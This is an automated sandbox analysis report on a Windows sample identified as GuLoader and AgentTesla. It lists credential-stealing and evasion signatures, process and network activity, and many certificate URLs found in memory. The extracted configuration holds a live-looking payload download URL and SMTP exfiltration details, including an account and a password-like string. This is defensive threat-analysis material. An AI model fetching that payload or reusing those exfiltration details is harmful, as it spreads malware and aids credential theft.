Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bluepoint2.exe

Overview

General Information

Sample Name:Bluepoint2.exe
Analysis ID:625508
MD5:c792c744dde586c896d6ca8cceb0e04a
SHA1:66273efb747ba478fc7c2122f647c0a01d16c4ca
SHA256:4385dcd25c41dcc70603b48daa969cb455c6fd605f7b3a7e6088557b9ab4964a
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • Bluepoint2.exe (PID: 1924 cmdline: "C:\Users\user\Desktop\Bluepoint2.exe" MD5: C792C744DDE586C896D6CA8CCEB0E04A)
    • CasPol.exe (PID: 1388 cmdline: "C:\Users\user\Desktop\Bluepoint2.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
    • CasPol.exe (PID: 4100 cmdline: "C:\Users\user\Desktop\Bluepoint2.exe" MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "laboral@cpassociats.com0E8KZjUqmail.cpassociats.comdoggyvirus01@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000B.00000000.83700958185.0000000001000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: CasPol.exe PID: 4100JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000002.00000002.84107890317.0000000003350000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT"}
            Source: Bluepoint2.exe.1924.2.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "laboral@cpassociats.com0E8KZjUqmail.cpassociats.comdoggyvirus01@gmail.com"}
            Multi AV Scanner detection for submitted file
            Source: Bluepoint2.exeVirustotal: Detection: 32%Perma Link
            Source: Bluepoint2.exeReversingLabs: Detection: 42%
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20160F02 CryptUnprotectData,11_2_20160F02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 11_2_20160EE0 CryptUnprotectData,11_2_20160EE0
            Source: Bluepoint2.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.11.20:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49782 version: TLS 1.2
            Source: Bluepoint2.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E
            Source: C:\Users\user\Desktop\Bluepoint2.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qk512l24argm1l66nhg5fuhtt/1652377275000/13609515036127870368/*/1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-20-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49783 -> 81.25.126.48:587
            Source: global trafficTCP traffic: 192.168.11.20:49783 -> 81.25.126.48:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, Cookies.11.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
            Source: Cookies.11.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 0000000B.00000002.88417087670.000000001DA31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://XkBFAe.com
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418601335.000000001DB85000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
            Source: CasPol.exe, 0000000B.00000003.84178091797.000000002094A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173448689.0000000020949000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
            Source: CasPol.exe, 0000000B.00000003.84078480008.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88394322933.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84078083345.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
            Source: CasPol.exe, 0000000B.00000003.84178091797.000000002094A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173448689.0000000020949000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
            Source: CasPol.exe, 0000000B.00000003.84078480008.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88394322933.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84082718094.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84078083345.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88415904285.000000001D81A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88393971968.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
            Source: CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: CasPol.exe, 0000000B.00000002.88394322933.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173334708.0000000020962000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84177788344.0000000020900000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426578968.0000000020901000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB0
            Source: CasPol.exe, 0000000B.00000002.88394322933.00000000011E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en4
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
            Source: CasPol.exe, 0000000B.00000003.84177569419.0000000020904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
            Source: Bluepoint2.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
            Source: Bluepoint2.exe, 00000002.00000002.84106911540.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, Bluepoint2.exe, 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1026.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
            Source: CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173099317.0000000020941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
            Source: CasPol.exe, 0000000B.00000003.84172452925.000000002094E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
            Source: CasPol.exe, 0000000B.00000003.84172936718.0000000020934000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418601335.000000001DB85000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
            Source: CasPol.exe, 0000000B.00000002.88415384631.000000001D7C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418601335.000000001DB85000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88418119268.000000001DB18000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426802779.000000002093E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: CasPol.exe, 0000000B.00000003.84177851316.00000000208DB000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.88426483436.00000000208E7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000003.84173531121.0000000020913000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
            Source: Bluepoint2.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: Bluepoint2.exeString found in binary or memory: http://s.symcd.com06
            Source: CasPol.exe, 0000000B.00000003.84177673427.00000000208E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
            Source: CasPol.exe, 0000000B.00000003.84173692774.0000000020907000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
